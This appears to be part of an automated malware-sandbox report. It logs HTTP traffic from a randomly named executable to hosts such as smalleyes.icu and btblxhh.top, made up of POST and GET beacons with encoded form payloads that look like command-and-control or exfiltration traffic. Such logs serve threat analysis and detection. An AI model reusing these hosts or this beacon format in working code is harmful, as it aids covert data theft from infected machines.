                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.smalleyes.icu
                                                                                                    Origin: http://www.smalleyes.icu
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.smalleyes.icu/s6zh/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 36 6e 6e 37 58 38 4c 48 4d 66 5a 56 49 57 2f 53 6b 75 4d 37 69 36 50 6d 46 64 57 31 4e 33 35 41 6a 50 4e 71 63 61 53 66 61 46 57 38 53 33 68 72 53 64 75 53 76 78 2f 45 54 6e 74 55 71 53 62 35 4d 43 42 72 70 34 78 66 6c 56 62 70 4e 35 76 47 36 44 46 56 4f 2f 39 4c 45 44 6d 46 74 37 55 4f 35 6b 34 36 41 4f 71 4f 2b 49 46 68 4e 69 53 6d 6b 35 6b 49 45 51 58 4c 38 52 65 6d 75 4b 43 30 52 6e 4b 6c 57 2f 6a 6c 63 69 6b 35 47 72 78 59 74 45 5a 34 50 56 78 45 6a 62 7a 4c 6c 50 43 71 75 57 54 6e 54 50 57 53 69 65 2f 32 6c 34 57 35 39 36 37 6d 6a 33 6f 77 39 67 2b 49 71 42 37 70 6f 56 51 59 73 54 63 3d
                                                                                                    Data Ascii: 1JgHkl=6nn7X8LHMfZVIW/SkuM7i6PmFdW1N35AjPNqcaSfaFW8S3hrSduSvx/ETntUqSb5MCBrp4xflVbpN5vG6DFVO/9LEDmFt7UO5k46AOqO+IFhNiSmk5kIEQXL8RemuKC0RnKlW/jlcik5GrxYtEZ4PVxEjbzLlPCquWTnTPWSie/2l4W5967mj3ow9g+IqB7poVQYsTc=


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.849723134.122.191.187805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:41.339796066 CET837OUTPOST /s6zh/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.smalleyes.icu
                                                                                                    Origin: http://www.smalleyes.icu
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.smalleyes.icu/s6zh/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 36 6e 6e 37 58 38 4c 48 4d 66 5a 56 4f 31 6e 53 6d 4a 67 37 7a 61 50 70 4b 39 57 31 44 58 35 45 6a 4f 78 71 63 5a 66 61 61 33 43 38 53 57 52 72 54 63 75 53 73 78 2f 45 63 48 74 52 6c 79 62 32 4d 43 46 4e 70 35 39 66 6c 56 2f 70 4e 34 66 47 36 77 64 4b 55 50 39 4a 43 44 6d 48 6a 62 55 4f 35 6b 34 36 41 4f 75 67 2b 4f 74 68 4e 52 4b 6d 32 73 51 4c 48 51 58 49 72 68 65 6d 71 4b 43 77 52 6e 4b 48 57 36 66 4c 63 68 4d 35 47 72 42 59 74 32 68 37 47 56 77 50 75 37 79 4b 31 2f 6d 75 69 57 62 2b 54 63 7a 33 6f 64 57 58 6b 4f 6e 54 6e 59 7a 67 67 33 41 62 39 6a 57 2b 76 32 6d 42 79 32 41 6f 79 45 4b 6d 51 41 5a 37 65 6d 53 6d 52 34 6e 57 71 6c 70 53 2b 33 44 65
                                                                                                    Data Ascii: 1JgHkl=6nn7X8LHMfZVO1nSmJg7zaPpK9W1DX5EjOxqcZfaa3C8SWRrTcuSsx/EcHtRlyb2MCFNp59flV/pN4fG6wdKUP9JCDmHjbUO5k46AOug+OthNRKm2sQLHQXIrhemqKCwRnKHW6fLchM5GrBYt2h7GVwPu7yK1/muiWb+Tcz3odWXkOnTnYzgg3Ab9jW+v2mBy2AoyEKmQAZ7emSmR4nWqlpS+3De
                                                                                                    Dec 3, 2024 14:16:42.922683954 CET1236INHTTP/1.1 404 Not Found
                                                                                                    Server: kangle/3.5
                                                                                                    Date: Tue, 03 Dec 2024 13:08:02 GMT
                                                                                                    Set-Cookie: home_lang=cn; path=/
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    X-Cache: MISS from kangle web server
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Data Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e [TRUNCATED]
                                                                                                    Data Ascii: b7e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>404</title><style type="text/css">.concenter-err {width: 100%;background: url(public/static/errpage/error_pic.png);}#warpper {width: 1220px;margin: 0 auto;position: relative;clear: both;font-family: "";}.clearfix {zoom: 1;}.clearfix:after, .clearfix:before {display: block;overflow: hidden;height: 0;content: '\0020';}.error-pic {background: url(public/static/errpage/404.png) no-repeat;}.error-page {width: 658px;height: 641px;margin: 44px auto 0;text-align: center;}.error-page-mb37 {margin-bottom: 37px;}.error-page-txt {padding-top: 391px;margin-bottom: 29px;font-family: \5FAE\8F6F\96C5\9ED1;}.error-page .error-page-txt h3 {font-size: 36px;color: #3B3B3B;font-weight: 900;padding-top: 6px;}.
                                                                                                    Dec 3, 2024 14:16:42.922770977 CET224INData Raw: 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 70 6c 34 38 20 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 38 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74
                                                                                                    Data Ascii: error-page-txt .error-page-pl48 {padding-left: 48px;}.error-page .error-page-txt p {font-size: 16px;color: #6B6B6B;padding-left: 56px;}.error-page-btn {height: 32px;padding-left: 26px;}.error-page-btn a:hover {backgrou
                                                                                                    Dec 3, 2024 14:16:42.922776937 CET1236INData Raw: 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 34 63 37 66 35 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 20 7b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 62 74 6e 20 61 20 7b 64 69 73 70 6c 61 79 3a 20 69
                                                                                                    Data Ascii: nd-color: #64c7f5;}.clearfix:after {clear: both;}.error-page-btn a {display: inline-block;width: 120px;height: 32px;margin: 0 15px;background-color: #70d2ff;color: white;line-height: 32px;font-size: 14px;text-decoration: none;}</style>
                                                                                                    Dec 3, 2024 14:16:42.923572063 CET500INData Raw: 72 76 61 6c 28 69 6e 74 65 72 76 61 6c 43 44 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 69 66 20 28 6f 53 65 63 73 20 3d 3d 20 30 29 7b 0d 0a 20
                                                                                                    Data Ascii: rval(intervalCD); return; } if (oSecs == 0){ clearInterval(intervalCD); window.location.href = __root_dir__+'/'; } document.getElementById('J_countdown').innerHTML = oSec


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.849724134.122.191.187805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:44.039673090 CET1854OUTPOST /s6zh/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.smalleyes.icu
                                                                                                    Origin: http://www.smalleyes.icu
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.smalleyes.icu/s6zh/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 36 6e 6e 37 58 38 4c 48 4d 66 5a 56 4f 31 6e 53 6d 4a 67 37 7a 61 50 70 4b 39 57 31 44 58 35 45 6a 4f 78 71 63 5a 66 61 61 33 36 38 53 6b 4a 72 54 37 53 53 74 78 2f 45 43 58 74 51 6c 79 62 52 4d 47 68 4a 70 35 68 70 6c 58 33 70 4e 66 33 47 38 42 64 4b 42 66 39 4a 41 44 6d 47 74 37 56 47 35 6b 6f 6d 41 4f 2b 67 2b 4f 74 68 4e 55 47 6d 6d 4a 6b 4c 42 51 58 4c 38 52 65 79 75 4b 43 59 52 6b 36 74 57 37 72 31 66 52 73 35 44 2f 6c 59 39 54 31 37 4e 56 77 4e 67 62 7a 5a 31 2f 62 77 69 57 58 49 54 64 57 63 6f 65 32 58 70 37 57 59 36 5a 44 6b 30 57 45 53 32 52 43 68 72 31 4f 4e 79 57 6b 6a 32 48 32 47 52 31 5a 41 51 30 62 73 45 5a 65 6a 39 6b 68 52 76 78 58 54 6d 62 4a 4d 6d 47 62 72 50 37 64 54 32 30 2b 36 4f 2f 51 53 53 4a 38 62 56 4f 69 74 50 4c 44 58 61 39 4b 76 30 59 69 45 6c 4d 43 6d 6d 64 76 56 59 4a 6d 66 44 34 37 61 55 4c 33 41 66 69 6c 78 2b 32 49 47 46 2b 48 43 48 39 77 66 79 42 5a 4d 47 41 59 5a 61 64 2f 67 2f 42 2f 6d 57 63 53 78 33 6d 7a 38 7a 53 2f 4f 37 59 55 39 63 6f 50 [TRUNCATED]
                                                                                                    Data Ascii: 1JgHkl=6nn7X8LHMfZVO1nSmJg7zaPpK9W1DX5EjOxqcZfaa368SkJrT7SStx/ECXtQlybRMGhJp5hplX3pNf3G8BdKBf9JADmGt7VG5komAO+g+OthNUGmmJkLBQXL8ReyuKCYRk6tW7r1fRs5D/lY9T17NVwNgbzZ1/bwiWXITdWcoe2Xp7WY6ZDk0WES2RChr1ONyWkj2H2GR1ZAQ0bsEZej9khRvxXTmbJMmGbrP7dT20+6O/QSSJ8bVOitPLDXa9Kv0YiElMCmmdvVYJmfD47aUL3Afilx+2IGF+HCH9wfyBZMGAYZad/g/B/mWcSx3mz8zS/O7YU9coPmcDkR8xuwKOABgQqatEMSI99QRNh2i5LTQU3H7VUlsoN2kRttkCIgkx9qdBLMskjcOO5vZYOGBeqNrKBT4anknZyohjiAzLLjVp/fSBJAVLQSJqQJYlgAuyVELSWHhsPmnGOaV2/bd0ccVXUeBHC2IT7CH3QO+2mTX0JDbT3ADGDswNPPXt4JIYyUJSWwzfhkqprfpKhJ30+JyJRFuo8Hw4ZYyOHuORmi7slvh2iWjUnQAuE1yXcnTl/hRny00KesyEFyIE9ggX9rfd2y3OAfR9/mTNHsG1IFFk/V3iXF0k9HfGbvXkZCNlWKjwCwBbetnAHrGuI5gSnm5STx60WE36zcGEgwTC07k1VEHjUWRquAsPPMO9t88zK/N5MAZbMtHixgnMOwm4mr/o5Wn0pAXY8eVmVZzhFAxt4iKM81WvuWdoLwkW5TCYumVj1nEUjwqfpDBOrfvTwiwz+ztjF+t3u8xBBIlZGCUEsRFDNnPYuUEr3GcKe3xHH7TWQzyKMxRpn4jFoPRUsLThXcpXDuC4WNYP6gdurCnMN/4kIDCUxhPTO6Y2JBlwGcFXqbPTq2Kn2Vig391COXAQj8gW2gqtnoG1IkPtm/Tif9FxK70pIx8Y8uZ83jrcJosIeXRYhWceuAaBkZBjwFtMWx73/ZBpUA+qabF7h1c [TRUNCATED]
                                                                                                    Dec 3, 2024 14:16:45.596532106 CET1236INHTTP/1.1 404 Not Found
                                                                                                    Server: kangle/3.5
                                                                                                    Date: Tue, 03 Dec 2024 13:08:04 GMT
                                                                                                    Set-Cookie: home_lang=cn; path=/
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    X-Cache: MISS from kangle web server
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Data Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e [TRUNCATED]
                                                                                                    Data Ascii: b7e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>404</title><style type="text/css">.concenter-err {width: 100%;background: url(public/static/errpage/error_pic.png);}#warpper {width: 1220px;margin: 0 auto;position: relative;clear: both;font-family: "";}.clearfix {zoom: 1;}.clearfix:after, .clearfix:before {display: block;overflow: hidden;height: 0;content: '\0020';}.error-pic {background: url(public/static/errpage/404.png) no-repeat;}.error-page {width: 658px;height: 641px;margin: 44px auto 0;text-align: center;}.error-page-mb37 {margin-bottom: 37px;}.error-page-txt {padding-top: 391px;margin-bottom: 29px;font-family: \5FAE\8F6F\96C5\9ED1;}.error-page .error-page-txt h3 {font-size: 36px;color: #3B3B3B;font-weight: 900;padding-top: 6px;}.
                                                                                                    Dec 3, 2024 14:16:45.596702099 CET224INData Raw: 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 70 6c 34 38 20 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 38 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74
                                                                                                    Data Ascii: error-page-txt .error-page-pl48 {padding-left: 48px;}.error-page .error-page-txt p {font-size: 16px;color: #6B6B6B;padding-left: 56px;}.error-page-btn {height: 32px;padding-left: 26px;}.error-page-btn a:hover {backgrou
                                                                                                    Dec 3, 2024 14:16:45.596708059 CET1236INData Raw: 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 34 63 37 66 35 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 20 7b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 62 74 6e 20 61 20 7b 64 69 73 70 6c 61 79 3a 20 69
                                                                                                    Data Ascii: nd-color: #64c7f5;}.clearfix:after {clear: both;}.error-page-btn a {display: inline-block;width: 120px;height: 32px;margin: 0 15px;background-color: #70d2ff;color: white;line-height: 32px;font-size: 14px;text-decoration: none;}</style>
                                                                                                    Dec 3, 2024 14:16:45.596822977 CET500INData Raw: 72 76 61 6c 28 69 6e 74 65 72 76 61 6c 43 44 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 69 66 20 28 6f 53 65 63 73 20 3d 3d 20 30 29 7b 0d 0a 20
                                                                                                    Data Ascii: rval(intervalCD); return; } if (oSecs == 0){ clearInterval(intervalCD); window.location.href = __root_dir__+'/'; } document.getElementById('J_countdown').innerHTML = oSec


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.849725134.122.191.187805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:46.707627058 CET562OUTGET /s6zh/?1JgHkl=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsMIJvPVmvlNwG1HEhIOCZ2tdwLUOtnvozCQbX7z6vra7jTg==&uZ9=wvL0WTq0tnld4P HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.smalleyes.icu
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:16:48.424956083 CET1236INHTTP/1.1 404 Not Found
                                                                                                    Server: kangle/3.5
                                                                                                    Date: Tue, 03 Dec 2024 13:08:07 GMT
                                                                                                    Set-Cookie: home_lang=cn; path=/
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    X-Cache: MISS from kangle web server
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Data Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e [TRUNCATED]
                                                                                                    Data Ascii: b7e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>404</title><style type="text/css">.concenter-err {width: 100%;background: url(public/static/errpage/error_pic.png);}#warpper {width: 1220px;margin: 0 auto;position: relative;clear: both;font-family: "";}.clearfix {zoom: 1;}.clearfix:after, .clearfix:before {display: block;overflow: hidden;height: 0;content: '\0020';}.error-pic {background: url(public/static/errpage/404.png) no-repeat;}.error-page {width: 658px;height: 641px;margin: 44px auto 0;text-align: center;}.error-page-mb37 {margin-bottom: 37px;}.error-page-txt {padding-top: 391px;margin-bottom: 29px;font-family: \5FAE\8F6F\96C5\9ED1;}.error-page .error-page-txt h3 {font-size: 36px;color: #3B3B3B;font-weight: 900;padding-top: 6px;}.
                                                                                                    Dec 3, 2024 14:16:48.424982071 CET1236INData Raw: 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 70 6c 34 38 20 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 38 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74
                                                                                                    Data Ascii: error-page-txt .error-page-pl48 {padding-left: 48px;}.error-page .error-page-txt p {font-size: 16px;color: #6B6B6B;padding-left: 56px;}.error-page-btn {height: 32px;padding-left: 26px;}.error-page-btn a:hover {background-color: #64c7f5;}
                                                                                                    Dec 3, 2024 14:16:48.424997091 CET724INData Raw: 6e 64 65 78 22 3e e8 bf 94 e5 9b 9e e9 a6 96 e9 a1 b5 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 3c 2f 64 69 76 3e 20 2d 2d 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 73 63 72 69 70 74 20 74
                                                                                                    Data Ascii: ndex"></a> </div> </div> </div> --></div><script type="text/javascript"> var oSecs = 7; var intervalCD; function time(){ oSecs --; if (oSecs < 0){ clearInterval(intervalCD);


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.849726156.234.28.101805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:54.913216114 CET811OUTPOST /dp9c/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.btblxhh.top
                                                                                                    Origin: http://www.btblxhh.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.btblxhh.top/dp9c/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 53 4b 38 69 41 4c 55 58 70 32 68 61 4c 72 6c 35 70 76 38 73 31 55 63 4c 61 35 6d 6b 53 33 47 50 54 54 63 6b 6a 41 47 37 37 79 6c 54 6a 53 6e 4d 45 65 35 64 6f 47 41 48 4f 6d 46 74 72 73 69 6f 56 4c 4c 34 76 6b 45 5a 74 4a 66 42 64 45 79 34 64 61 53 66 49 6d 4c 57 57 67 59 35 4f 76 4c 51 58 6c 65 6e 63 63 65 37 46 64 39 2b 51 45 62 51 59 78 70 2b 57 31 42 6e 63 50 4d 4a 63 65 34 52 34 4b 65 66 44 34 62 6b 71 43 52 71 6a 35 31 67 34 73 42 6e 45 44 69 65 68 6e 34 6b 34 51 6e 59 69 73 6f 63 36 39 39 61 70 64 32 35 4f 6a 4c 34 39 49 44 47 55 38 73 58 78 61 7a 6d 65 67 79 71 45 32 44 6e 76 63 45 3d
                                                                                                    Data Ascii: 1JgHkl=SK8iALUXp2haLrl5pv8s1UcLa5mkS3GPTTckjAG77ylTjSnMEe5doGAHOmFtrsioVLL4vkEZtJfBdEy4daSfImLWWgY5OvLQXlencce7Fd9+QEbQYxp+W1BncPMJce4R4KefD4bkqCRqj51g4sBnEDiehn4k4QnYisoc699apd25OjL49IDGU8sXxazmegyqE2DnvcE=
                                                                                                    Dec 3, 2024 14:16:56.493078947 CET1135INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:56 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Content-Encoding: gzip
